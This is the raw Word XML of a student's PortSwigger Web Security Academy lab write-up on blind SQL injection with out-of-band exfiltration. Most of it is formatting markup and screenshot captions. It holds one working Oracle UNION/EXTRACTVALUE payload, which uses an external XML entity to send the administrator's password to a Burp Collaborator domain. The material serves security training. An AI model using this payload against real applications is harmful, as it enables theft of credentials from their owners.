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0" w:before="0"/>
        <w:ind w:left="-1440" w:right="-1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy — Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="566573"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0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Blind SQL injection with out-of-band data exfiltration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 Injection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Lab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 14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Researcher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PortSwigger Web Security Academy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Lab Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="F39C12" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="200" w:before="0"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltrate the administrator password out-of-band using Burp Collaborator with XML extraction payload.</w:t>
      </w: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Step-by-Step Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E74C3C" w:sz="12"/>
        </w:pBd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74C3C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">'+UNION+SELECT+EXTRACTVALUE(xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.ukivotxsfbi3l2ys4y3toes2otukic61.oastify.com/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual--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ukivotxsfbi3l2ys4y3toes2otukic61.oastify.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="20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Screenshots &amp; Evidence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1: 1st Image Home Page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2: Admin Password In Collaborator DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Solved — Confirmation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3: Lab Solved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4: Modify The Request Trackin Id With Collabo ID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5: Select The Targer From The Proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="27AE60" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="80" w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Status: SOLVED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22B21" w:sz="4"/>
      </w:pBdr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Blind SQL injection with out-of-band data exfiltration  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr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  <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">PortSwigger Academy PoC  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">SQL Injection — Lab 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C0392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40399a462de44eb0ca59426c8dfcc8a00d0e5fd.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/82b492c86502896b795234e10d07fbbbe093b1e0.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/75bc22ca773c834151c381cc23e6212127a88bcb.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a2c44ba470b83ac1d209c3e1edb813bef3d952a0.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8d997e6243b801e8debf1fb7977e97bed5309cb2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2026-05-24T12:08:40.080Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:08:40.080Z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